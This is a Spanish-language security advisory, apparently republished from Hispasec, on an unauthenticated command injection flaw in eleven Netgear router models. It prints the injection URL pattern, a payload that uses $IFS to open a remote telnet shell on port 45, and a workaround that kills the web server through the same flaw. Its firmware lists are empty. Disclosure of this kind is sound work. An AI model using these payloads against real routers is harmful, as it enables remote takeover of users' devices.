Se ha confirmado una vulnerabilidad de inyección de comandos en múltiples modelos de routers Netgear. El problema es especialmente grave dada la facilidad con que se puede reproducir.

Netgear ha confirmado el problema y ratifica que afecta a los siguientes modelos:

  1. R6250
  2. R6400
  3. R6700
  4. R6900
  5. R7000
  6. R7100LG
  7. R7300DST
  8. R7900
  9. R8000
  10. D6220
  11. D6400

La vulnerabilidad puede permitir a un atacante remoto ejecutar comandos arbitrarios en los dispositivos afectados. Basta con tener acceso a la interfaz de administración web del router (aunque no se esté autenticado). Para conseguir su objetivo el atacante puede convencer o engañar al usuario para que visite un sitio web específicamente creado.

El ataque se reduce a:

http://<router_IP>/cgi-bin/;COMANDO

Un atacante puede abrir un Telnet remoto en el puerto 45, con una petición como:

http://RouterIP/;telnetd$IFS-p$IFS’45&#8217;

Como contramedida se puede desactivar la interfaz de administración web, mediante el siguiente comando:

http://<router_IP>/cgi-bin/;killall$IFS’httpd&#8217;

“NETGEAR is working on a production firmware version that fixes this command injection vulnerability and will release it as quickly as possible.” (“NETGEAR está trabajando en una versión de firmware de producción que corrija esta vulnerabilidad de inyección de comandos y la publicará lo más rápido posible”)

En la actualidad existen versiones beta del firmware que solucionan el problema para los siguientes modelos:

Y las siguientes versiones de producción del firmware:

Más información:

Fuente: Hispasec

Anuncios